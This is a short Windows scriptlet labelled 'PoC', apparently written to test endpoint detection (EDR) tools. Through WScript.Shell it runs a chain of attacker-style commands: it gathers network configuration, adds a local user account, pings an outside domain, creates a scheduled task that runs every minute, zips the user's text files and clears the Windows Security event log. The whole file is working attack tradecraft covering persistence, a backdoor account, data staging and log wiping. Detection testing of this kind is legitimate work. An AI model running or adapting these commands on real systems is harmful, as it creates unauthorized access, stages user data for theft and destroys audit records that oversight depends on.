<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<script language="JScript">
		<![CDATA[
			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
			var r = new ActiveXObject("WScript.Shell").Run("ipconfig /all > %USERPROFILE%\ipconfig.txt");
			var r = new ActiveXObject("WScript.Shell").Run("net user /add shigeru123");
			var r = new ActiveXObject("WScript.Shell").Run("ping nato-press.com");
			var r = new ActiveXObject("WScript.Shell").Run("schtasks /create /tn “testtask1” /tr “c:\edrtest.vbs” /sc MINUTE");
			var r = new ActiveXObject("WScript.Shell").Run("powershell Compress-Archive -Path %USERPROFILE%\*.txt -Destination %USERPROFILE%\edrtest.zip");
			var r = new ActiveXObject("WScript.Shell").Run("wevtutil cl Security");

]]>
</script>
</registration>
</scriptlet>
